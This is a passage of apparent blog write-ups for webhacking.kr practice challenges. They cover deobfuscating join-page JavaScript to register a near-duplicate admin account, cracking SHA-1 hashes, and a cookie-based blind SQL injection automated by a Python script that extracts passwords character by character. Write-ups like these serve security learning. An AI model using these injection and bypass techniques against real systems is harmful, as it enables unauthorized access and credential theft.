Github</a></p> <p>Now as you know the value of username/password combination to use. Simply modify the cookie value to what we have generated and the problem will be solved. If you solved the challenge in an easier way, do let me know. Let us share and learn :)</p> Sat, 13 Jun 2015 00:00:00 -0700 https://blog.0daylabs.com/2015/06/13/0ldzombie-6/ https://blog.0daylabs.com/2015/06/13/0ldzombie-6/ webchallenges 0ldzombie webhacking.kr - 0ldzombie challenge writeup 5 <p>Well, the last challenge was pretty easy and I was dissapointed since it was not very challenging. And I had a feeling that next one will be awesome and fortunately, it is !</p> <p><strong>Note:</strong> <em>I am putting up the write up so that if you are not able to complete the challenges after trying for awhile, you can refer to the solution to see how I did it. Please don’t look into the solution before you try out the challenges by yourself.</em></p> <p>Well, when you open this challenge, the first thing you see is a login page and a join page. As always I looked into the source code and saw that the login is redirected to <code class="language-plaintext highlighter-rouge">mem/login.php</code> and if we click on join, it says access denied. Also, if we try to login to the page, it says we need to login as admin. So obviously something is fishy about the join.php right ? Also I assumed that since login.php is redicrected to mem/login.php, I directly tried to go to <code class="language-plaintext highlighter-rouge">mem/join.php</code> and it returned a blank page. Looking at the source code, I saw a type JavaScript obfuscation. Let us copy and beautify it:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"><span class="nt">&lt;script&gt;</span> <span class="nx">l</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">a</span><span class="dl">'</span><span class="p">;</span> <span class="nx">ll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">b</span><span class="dl">'</span><span class="p">;</span> <span class="nx">lll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">c</span><span class="dl">'</span><span class="p">;</span> <span class="nx">llll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">d</span><span class="dl">'</span><span class="p">;</span> <span class="nx">lllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">e</span><span class="dl">'</span><span class="p">;</span> <span class="nx">llllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">f</span><span class="dl">'</span><span class="p">;</span> <span class="nx">lllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">g</span><span class="dl">'</span><span class="p">;</span> <span class="nx">llllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">h</span><span class="dl">'</span><span class="p">;</span> <span class="nx">lllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">i</span><span class="dl">'</span><span class="p">;</span> <span class="nx">llllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">j</span><span class="dl">'</span><span class="p">;</span> <span class="nx">lllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">k</span><span class="dl">'</span><span class="p">;</span> <span class="nx">llllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">l</span><span class="dl">'</span><span class="p">;</span> <span class="nx">lllllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">m</span><span class="dl">'</span><span class="p">;</span> <span class="nx">llllllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">n</span><span class="dl">'</span><span class="p">;</span> <span class="nx">lllllllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">o</span><span class="dl">'</span><span class="p">;</span> <span class="nx">llllllllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">;</span> <span class="nx">lllllllllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">q</span><span class="dl">'</span><span class="p">;</span> <span class="nx">llllllllllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">r</span><span class="dl">'</span><span class="p">;</span> <span class="nx">lllllllllllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">s</span><span class="dl">'</span><span class="p">;</span> <span class="nx">llllllllllllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">t</span><span class="dl">'</span><span class="p">;</span> <span class="nx">lllllllllllllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">u</span><span class="dl">'</span><span class="p">;</span> <span class="nx">llllllllllllllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">v</span><span class="dl">'</span><span class="p">;</span> <span class="nx">lllllllllllllllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">w</span><span class="dl">'</span><span class="p">;</span> <span class="nx">llllllllllllllllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">x</span><span class="dl">'</span><span class="p">;</span> <span class="nx">lllllllllllllllllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">y</span><span class="dl">'</span><span class="p">;</span> <span class="nx">llllllllllllllllllllllllll</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">z</span><span class="dl">'</span><span class="p">;</span> <span class="nx">I</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">1</span><span class="dl">'</span><span class="p">;</span> <span class="nx">II</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">2</span><span class="dl">'</span><span class="p">;</span> <span class="nx">III</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">3</span><span class="dl">'</span><span class="p">;</span> <span class="nx">IIII</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">4</span><span class="dl">'</span><span class="p">;</span> <span class="nx">IIIII</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">5</span><span class="dl">'</span><span class="p">;</span> <span class="nx">IIIIII</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">6</span><span class="dl">'</span><span class="p">;</span> <span class="nx">IIIIIII</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">7</span><span class="dl">'</span><span class="p">;</span> <span class="nx">IIIIIIII</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">8</span><span class="dl">'</span><span class="p">;</span> <span class="nx">IIIIIIIII</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">9</span><span class="dl">'</span><span class="p">;</span> <span class="nx">IIIIIIIIII</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">0</span><span class="dl">'</span><span class="p">;</span> <span class="nx">li</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">.</span><span class="dl">'</span><span class="p">;</span> <span class="nx">ii</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">&lt;</span><span class="dl">'</span><span class="p">;</span> <span class="nx">iii</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="nx">lIllIllIllIllIllIllIllIllIllIl</span> <span class="o">=</span> <span class="nx">lllllllllllllll</span> <span class="o">+</span> <span class="nx">llllllllllll</span> <span class="o">+</span> <span class="nx">llll</span> <span class="o">+</span> <span class="nx">llllllllllllllllllllllllll</span> <span class="o">+</span> <span class="nx">lllllllllllllll</span> <span class="o">+</span> <span class="nx">lllllllllllll</span> <span class="o">+</span> <span class="nx">ll</span> <span class="o">+</span> <span class="nx">lllllllll</span> <span class="o">+</span> <span class="nx">lllll</span><span class="p">;</span> <span class="nx">lIIIIIIIIIIIIIIIIIIl</span> <span class="o">=</span> <span class="nx">llll</span> <span class="o">+</span> <span class="nx">lllllllllllllll</span> <span class="o">+</span> <span class="nx">lll</span> <span class="o">+</span> <span class="nx">lllllllllllllllllllll</span> <span class="o">+</span> <span class="nx">lllllllllllll</span> <span class="o">+</span> <span class="nx">lllll</span> <span class="o">+</span> <span class="nx">llllllllllllll</span> <span class="o">+</span> <span class="nx">llllllllllllllllllll</span> <span class="o">+</span> <span class="nx">li</span> <span class="o">+</span> <span class="nx">lll</span> <span class="o">+</span> <span class="nx">lllllllllllllll</span> <span class="o">+</span> <span class="nx">lllllllllllllll</span> <span class="o">+</span> <span class="nx">lllllllllll</span> <span class="o">+</span> <span class="nx">lllllllll</span> <span class="o">+</span> <span class="nx">lllll</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="nb">eval</span><span class="p">(</span><span class="nx">lIIIIIIIIIIIIIIIIIIl</span><span class="p">).</span><span class="nx">indexOf</span><span class="p">(</span><span class="nx">lIllIllIllIllIllIllIllIllIllIl</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nx">bye</span><span class="p">;</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span class="nb">eval</span><span class="p">(</span><span class="nx">llll</span> <span class="o">+</span> <span class="nx">lllllllllllllll</span> <span class="o">+</span> <span class="nx">lll</span> <span class="o">+</span> <span class="nx">lllllllllllllllllllll</span> <span class="o">+</span> <span class="nx">lllllllllllll</span> <span class="o">+</span> <span class="nx">lllll</span> <span class="o">+</span> <span class="nx">llllllllllllll</span> <span class="o">+</span> <span class="nx">llllllllllllllllllll</span> <span class="o">+</span> <span class="nx">li</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">U</span><span class="dl">'</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">R</span><span class="dl">'</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">L</span><span class="dl">'</span><span class="p">).</span><span class="nx">indexOf</span><span class="p">(</span><span class="nx">lllllllllllll</span> <span class="o">+</span> <span class="nx">lllllllllllllll</span> <span class="o">+</span> <span class="nx">llll</span> <span class="o">+</span> <span class="nx">lllll</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">=</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">I</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nx">alert</span><span class="p">(</span><span class="dl">'</span><span class="s1">access_denied</span><span class="dl">'</span><span class="p">);</span> <span class="nx">history</span><span class="p">.</span><span class="nx">go</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="dl">'</span><span class="s1">&lt;font size=2 color=white&gt;Join&lt;/font&gt;&lt;p&gt;</span><span class="dl">'</span><span class="p">);</span> <span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="dl">'</span><span class="s1">.&lt;p&gt;.&lt;p&gt;.&lt;p&gt;.&lt;p&gt;.&lt;p&gt;</span><span class="dl">'</span><span class="p">);</span> <span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="dl">'</span><span class="s1">&lt;form method=post action=</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">llllllllll</span> <span class="o">+</span> <span class="nx">lllllllllllllll</span> <span class="o">+</span> <span class="nx">lllllllll</span> <span class="o">+</span> <span class="nx">llllllllllllll</span> <span class="o">+</span> <span class="nx">li</span> <span class="o">+</span> <span class="nx">llllllllllllllll</span> <span class="o">+</span> <span class="nx">llllllll</span> <span class="o">+</span> <span class="nx">llllllllllllllll</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">&gt;</span><span class="dl">'</span><span class="p">);</span> <span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="dl">'</span><span class="s1">&lt;table border=1&gt;&lt;tr&gt;&lt;td&gt;&lt;font color=gray&gt;id&lt;/font&gt;&lt;/td&gt;&lt;td&gt;&lt;input type=text name=</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">lllllllll</span> <span class="o">+</span> <span class="nx">llll</span> <span class="o">+</span> <span class="dl">'</span><span class="s1"> maxlength=5&gt;&lt;/td&gt;&lt;/tr&gt;</span><span class="dl">'</span><span class="p">);</span> <span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="dl">'</span><span class="s1">&lt;tr&gt;&lt;td&gt;&lt;font color=gray&gt;pass&lt;/font&gt;&lt;/td&gt;&lt;td&gt;&lt;input type=text name=</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">llllllllllllllll</span> <span class="o">+</span> <span class="nx">lllllllllllllllllllllll</span> <span class="o">+</span> <span class="dl">'</span><span class="s1"> maxlength=10&gt;&lt;/td&gt;&lt;/tr&gt;</span><span class="dl">'</span><span class="p">);</span> <span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="dl">'</span><span class="s1">&lt;tr align=center&gt;&lt;td colspan=2&gt;&lt;input type=submit&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;</span><span class="dl">'</span><span class="p">);</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>Well, good looking code isn’t it ? Here, the main things comes in the last <code class="language-plaintext highlighter-rouge">if</code> loop. It is always giving -1 and for that matter the condition is always exiting with a message access_denied. So what to do ? I simply copy pasted the else part to the console and executed in the context of that page and there, I saw the box to signup with a password. So I immideatly tried to signup for the name admin but it failed since admin already existed. So I tried to make something really near to admin line admin + a blank space so in total it becomes 6 characters but are very close to the name admin.</p> <p>But when we executed the JavaScript, it limits the number of characters to 5 default. So I modified it into 6, tried signup with a small password and this time, it successfully signed up. Now I went to mem/login.php and it worked. Challenge solved !</p> <p>The challenge was fun but a bit weird too. So how did you solve it ? If you solved the challenge in an easier way, do let me know. Let us share and learn :)</p> Sat, 13 Jun 2015 00:00:00 -0700 https://blog.0daylabs.com/2015/06/13/0ldzombie-5/ https://blog.0daylabs.com/2015/06/13/0ldzombie-5/ webchallenges 0ldzombie webhacking.kr - 0ldzombie challenge writeup 4 <p>I hope by the time you are reading this, you had already completed the rest 3 challenges. The 4th challenge is an easy one as you can guess, because it is a 150 point problem. Now let us see how to approch this problem.</p> <p><strong>Note:</strong> <em>I am putting up the write up on my blog so that if you are not able to complete the challenges after trying for awhile, you can refer to the solution to see how I did it. Please don’t look into the solution before you try out the challenges by yourself.</em></p> <p>In this challenge all that is given is a string like this: <code class="language-plaintext highlighter-rouge">YzQwMzNiZmY5NGI1NjdhMTkwZTMzZmFhNTUxZjQxMWNhZWY0NDRmMg==</code>. Well, the moment you see the string, the 2 equal signs indicate that there is a strong chance of base64 encoding here. So after decoding, we will get something like this: <code class="language-plaintext highlighter-rouge">c4033bff94b567a190e33faa551f411caef444f2</code>. Well, it seems our first method was an instant success. Now we got something which looks like a hash. Let us try to identify which type of hash could it probably be.</p> <p>If you use any online hash identifier, most of them suggests that this could be an SHA-1 encryption. Well, if it really is an SHA-1, there is no way to crack it unless it is already stored in some online SHA-1 cracking websites. So after digging up on that I reached a site called <a href="http://www.hashkiller.co.uk/sha1-decrypter.aspx">hashkiller</a> which helped me decrypt the string. So after the decryption I again got a string which is of the same length: <code class="language-plaintext highlighter-rouge">a94a8fe5ccb19ba61c4c0873d391e987982fbbd3</code>. Now what ?</p> <p>Well, I simply assumed that this one will again be a SHA-1 since it is of same length. So I gave the new string as input this time and it gave back the correct result in plain text. For some reason, I didn’t enjoy this challenge like the other ones. May be next one will be better :)</p> Sat, 13 Jun 2015 00:00:00 -0700 https://blog.0daylabs.com/2015/06/13/0ldzombie-4/ https://blog.0daylabs.com/2015/06/13/0ldzombie-4/ webchallenges 0ldzombie webhacking.kr - 0ldzombie challenge writeup 2 <p>I hope you have been through the 0ldzombie challenge 2 writeup. Now let us discuss the next challenge. Challenge 1 was fairly easy and straight forward while challenge 2 is a 500 point problem, so it’s not as easy like the last one. So let us see the way I approched the problem.</p> <p><strong>Note:</strong> <em>I am putting up the write up on my blog so that if you are not able to complete the challenges after trying it for awhile, you can refer to the solution to see how I did it. Please don’t look into the solution before you try out the challenges by yourself.</em></p> <p>Just like always, the first thing to look into is the source code of the challenge. At the first look, you might not see anything special in it.</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"><span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;title&gt;</span>Project Progress<span class="nt">&lt;/title&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body</span> <span class="na">bgcolor=</span><span class="s">black</span><span class="nt">&gt;</span> <span class="nt">&lt;center&gt;</span> <span class="nt">&lt;table</span> <span class="na">width=</span><span class="s">970</span> <span class="na">bgcolor=</span><span class="s">white</span><span class="nt">&gt;</span> <span class="nt">&lt;td</span> <span class="na">colspan=</span><span class="s">5</span><span class="nt">&gt;</span> <span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">"img/new_main.jpg"</span> <span class="na">alt=</span><span class="s">""</span> <span class="na">usemap=</span><span class="s">"#main.jpg"</span> <span class="na">style=</span><span class="s">"border: 0;"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;map</span> <span class="na">name=</span><span class="s">"main.jpg"</span><span class="nt">&gt;</span> <span class="nt">&lt;area</span> <span class="na">shape=</span><span class="s">"rect"</span> <span class="na">coords=</span><span class="s">"15,8,517,54"</span> <span class="na">href=</span><span class="s">"index.php"</span> <span class="na">target=</span><span class="s">""</span> <span class="na">alt=</span><span class="s">""</span> <span class="nt">/&gt;</span> <span class="nt">&lt;area</span> <span class="na">shape=</span><span class="s">"rect"</span> <span class="na">coords=</span><span class="s">"339,63,403,93"</span> <span class="na">href=</span><span class="s">"about.php"</span> <span class="na">target=</span><span class="s">""</span> <span class="na">alt=</span><span class="s">""</span> <span class="nt">/&gt;</span> <span class="nt">&lt;area</span> <span class="na">shape=</span><span class="s">"rect"</span> <span class="na">coords=</span><span class="s">"413,63,490,92"</span> <span class="na">href=</span><span class="s">"member.php"</span> <span class="na">target=</span><span class="s">""</span> <span class="na">alt=</span><span class="s">""</span> <span class="nt">/&gt;</span> <span class="nt">&lt;area</span> <span class="na">shape=</span><span class="s">"rect"</span> <span class="na">coords=</span><span class="s">"500,63,582,92"</span> <span class="na">href=</span><span class="s">"research.php"</span> <span class="na">target=</span><span class="s">""</span> <span class="na">alt=</span><span class="s">""</span> <span class="nt">/&gt;</span> <span class="nt">&lt;area</span> <span class="na">shape=</span><span class="s">"rect"</span> <span class="na">coords=</span><span class="s">"592,63,651,92"</span> <span class="na">href=</span><span class="s">"bbs/index.php"</span> <span class="na">target=</span><span class="s">""</span> <span class="na">alt=</span><span class="s">""</span> <span class="nt">/&gt;</span> <span class="nt">&lt;area</span> <span class="na">shape=</span><span class="s">"rect"</span> <span class="na">coords=</span><span class="s">"662,64,745,93"</span> <span class="na">href=</span><span class="s">"fun.php"</span> <span class="na">target=</span><span class="s">""</span> <span class="na">alt=</span><span class="s">""</span> <span class="nt">/&gt;</span> <span class="nt">&lt;area</span> <span class="na">shape=</span><span class="s">"rect"</span> <span class="na">coords=</span><span class="s">"756,63,825,93"</span> <span class="na">href=</span><span class="s">"contact.php"</span> <span class="na">target=</span><span class="s">""</span> <span class="na">alt=</span><span class="s">""</span> <span class="nt">/&gt;</span> <span class="nt">&lt;area</span> <span class="na">shape=</span><span class="s">"rect"</span> <span class="na">coords=</span><span class="s">"851,7,890,65"</span> <span class="na">href=</span><span class="s">"admin/"</span> <span class="na">target=</span><span class="s">""</span> <span class="na">alt=</span><span class="s">""</span> <span class="nt">/&gt;</span> <span class="nt">&lt;center&gt;</span> <span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">index.php</span><span class="nt">&gt;&lt;img</span> <span class="na">src=</span><span class="s">img/new.jpg</span> <span class="na">border=</span><span class="s">0</span><span class="nt">&gt;&lt;/a&gt;&lt;br&gt;</span> <span class="nt">&lt;br&gt;&lt;br&gt;</span> <span class="c">&lt;!--2015-06-13 12:53:02--&gt;</span><span class="nt">&lt;/td&gt;</span> <span class="nt">&lt;td</span> <span class="na">width=</span><span class="s">88</span><span class="nt">&gt;&lt;/td&gt;</span> <span class="nt">&lt;/table&gt;</span></code></pre></figure> <p>Anything looking suspicious ? Yes, the <code class="language-plaintext highlighter-rouge">admin/</code> directory is directly exposed and if you go the url, it asks for admin password. Alright, so what now ? SQLi in the admin password box ? Well, I tried everything I could, but didn’t work. So I went back and took a look at the cookies in the page and I was suspicious when I saw a cookie named <code class="language-plaintext highlighter-rouge">time</code>. Strange isn’t it ? Also, one more notable thing is that the time is commented in the page source code like this <code class="language-plaintext highlighter-rouge">&lt;!--2015-06-13 12:53:02--&gt;</code>. Did anyone notice that in the first look ? Well, I didn’t !</p> <p>Alright now let us tamper with cookies for sometime. I tried several things but then an idea struck me when I successfully got a Blind cookie based injection. Let us say the value of the <code class="language-plaintext highlighter-rouge">time</code> cookie is now <code class="language-plaintext highlighter-rouge">1434124382</code>. I just modified the cookie value to <code class="language-plaintext highlighter-rouge">1434124382 and 1=1</code> and in the source code, the time comment got changed to <code class="language-plaintext highlighter-rouge">2070-01-01 09:00:01</code>. Well that’s strange isn’t it ? Now let us make the condition false by changing the cookie to <code class="language-plaintext highlighter-rouge">1434124382 and 1=0</code> and I checked the source again. The comment just got changed to <code class="language-plaintext highlighter-rouge">2070-01-01 09:00:00</code>.</p> <p>You got the point? The moment the condition goes wrong, the last bit of the comment changes to <code class="language-plaintext highlighter-rouge">0</code> and if the condition is true, the last bit is <code class="language-plaintext highlighter-rouge">1</code>. This is exactly what we wanted to have a successsful exploitation.</p> <p>Also, in the same challenge, if you go to the <a href="http://webhacking.kr/challenge/web/web-02/bbs/index.php">board section</a>, you can see that there is a message on the board, and if you click on the subject, they will ask you for the password. So basically, we need 2 passwords for a successful exploitation. I assumed that the admin password will be saved in a table named <code class="language-plaintext highlighter-rouge">admin</code> and I got a hint that the board password is in a table named <code class="language-plaintext highlighter-rouge">FreeB0aRd</code>. The main problem with the Blind injection is that if we try to do the same manually, it will take too much time. So I tried automating it in python and here is my code:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1">#!/usr/bin/python3.4 # Written by Anirudh Anand (lucif3r) : email - anirudh@anirudhanand.com </span> <span class="c1"># This is the solution to 0ldzombie's Webhacking.kr Challenge 2: Blind SQL Injection # The script uses requests library in python 3.4 </span> <span class="kn">import</span> <span class="nn">re</span> <span class="kn">import</span> <span class="nn">requests</span> <span class="n">__author__</span> <span class="o">=</span> <span class="s">'lucif3r'</span> <span class="k">class</span> <span class="nc">Challenge2</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="k">print</span><span class="p">(</span><span class="s">"[+] Blind SQL injection for 0ldzombie challenge 2"</span><span class="p">)</span> <span class="bp">self</span><span class="p">.</span><span class="n">PHPSESSID</span> <span class="o">=</span> <span class="s">"1gmj9l627im3q87fb5822topk3"</span> <span class="bp">self</span><span class="p">.</span><span class="n">board_pass</span> <span class="o">=</span> <span class="s">""</span> <span class="bp">self</span><span class="p">.</span><span class="n">admin_pass</span> <span class="o">=</span> <span class="s">""</span> <span class="bp">self</span><span class="p">.</span><span class="n">board_pass_length</span> <span class="o">=</span> <span class="mi">0</span> <span class="bp">self</span><span class="p">.</span><span class="n">admin_pass_length</span> <span class="o">=</span> <span class="mi">0</span> <span class="bp">self</span><span class="p">.</span><span class="n">url</span> <span class="o">=</span> <span class="s">"http://webhacking.kr/challenge/web/web-02/"</span> <span class="k">return</span> <span class="k">def</span> <span class="nf">length_password</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">user</span><span class="p">):</span> <span class="s">""" This function is trying to understand the length of the password of users given as a parameter. :param user: -&gt; The name of the user whose password length has to be found out. :return: """</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">15</span><span class="p">):</span> <span class="n">cookies</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">(</span><span class="n">PHPSESSID</span><span class="o">=</span><span class="bp">self</span><span class="p">.</span><span class="n">PHPSESSID</span><span class="p">,</span> <span class="n">time</span><span class="o">=</span><span class="s">'1434109174 and (select length (password) from '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">user</span><span class="p">)</span> <span class="o">+</span> <span class="s">') = '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">))</span> <span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">url</span><span class="p">,</span> <span class="n">cookies</span><span class="o">=</span><span class="n">cookies</span><span class="p">)</span> <span class="n">res</span> <span class="o">=</span> <span class="n">req</span><span class="p">.</span><span class="n">text</span> <span class="n">temp</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">'2070-01-01 09:00:01'</span><span class="p">,</span> <span class="n">res</span><span class="p">)</span> <span class="k">if</span> <span class="n">temp</span> <span class="ow">and</span> <span class="n">user</span> <span class="o">==</span> <span class="s">'admin'</span><span class="p">:</span> <span class="bp">self</span><span class="p">.</span><span class="n">admin_pass_length</span> <span class="o">=</span> <span class="n">i</span> <span class="k">print</span><span class="p">(</span><span class="s">'[+] Admin Password length = '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">admin_pass_length</span><span class="p">))</span> <span class="k">break</span> <span class="k">if</span> <span class="n">temp</span> <span class="ow">and</span> <span class="n">user</span> <span class="o">==</span> <span class="s">'FreeB0aRd'</span><span class="p">:</span> <span class="bp">self</span><span class="p">.</span><span class="n">board_pass_length</span> <span class="o">=</span> <span class="n">i</span> <span class="k">print</span><span class="p">(</span><span class="s">'[+] FreeB0aRd Password length = '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">board_pass_length</span><span class="p">))</span> <span class="k">break</span> <span class="n">temp</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">return</span> <span class="k">def</span> <span class="nf">crack_password</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">pass_len</span><span class="p">):</span> <span class="s">""" This function will try to crack the password if the username and the length of the password are provided. Use length_password() to find out the length of the password. :param user: -&gt; username of whom the password has to be found out :param pass_len: -&gt; Length of the password found out for the same user :return: """</span> <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">pass_len</span><span class="o">+</span><span class="mi">1</span><span class="p">):</span> <span class="k">print</span><span class="p">(</span><span class="s">"[+] Letters more to go: "</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">pass_len</span><span class="o">+</span><span class="mi">1</span> <span class="o">-</span> <span class="n">j</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">33</span><span class="p">,</span> <span class="mi">126</span><span class="p">):</span> <span class="n">cookies</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">(</span><span class="n">PHPSESSID</span><span class="o">=</span><span class="bp">self</span><span class="p">.</span><span class="n">PHPSESSID</span><span class="p">,</span> <span class="n">time</span><span class="o">=</span><span class="s">'1434114374 and (select ascii(substr(password, '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">j</span><span class="p">)</span> <span class="o">+</span> <span class="s">', 1)) from '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">user</span><span class="p">)</span> <span class="o">+</span> <span class="s">') = '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">))</span> <span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">url</span><span class="p">,</span> <span class="n">cookies</span><span class="o">=</span><span class="n">cookies</span><span class="p">)</span> <span class="n">res</span> <span class="o">=</span> <span class="n">req</span><span class="p">.</span><span class="n">text</span> <span class="n">temp</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">'2070-01-01 09:00:01'</span><span class="p">,</span> <span class="n">res</span><span class="p">)</span> <span class="k">if</span> <span class="n">temp</span> <span class="ow">and</span> <span class="n">user</span> <span class="o">==</span> <span class="s">'admin'</span><span class="p">:</span> <span class="bp">self</span><span class="p">.</span><span class="n">admin_pass</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'[+] Admin Password till now = '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">admin_pass</span><span class="p">))</span> <span class="k">break</span> <span class="k">if</span> <span class="n">temp</span> <span class="ow">and</span> <span class="n">user</span> <span class="o">==</span> <span class="s">'FreeB0aRd'</span><span class="p">:</span> <span class="bp">self</span><span class="p">.</span><span class="n">board_pass</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'[+] FreeB0aRd Password till now = '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">board_pass</span><span class="p">))</span> <span class="k">break</span> <span class="n">temp</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">return</span> <span class="k">def</span> <span class="nf">print_vaules</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="k">print</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s"> ----------------------------------"</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">"[+] Admin Password Length = "</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">admin_pass_length</span><span class="p">))</span> <span class="k">print</span><span class="p">(</span><span class="s">"[+] Admin Password = "</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">admin_pass</span><span class="p">))</span> <span class="k">print</span><span class="p">(</span><span class="s">"[+] FreeB0aRd Password Length = "</span> <span 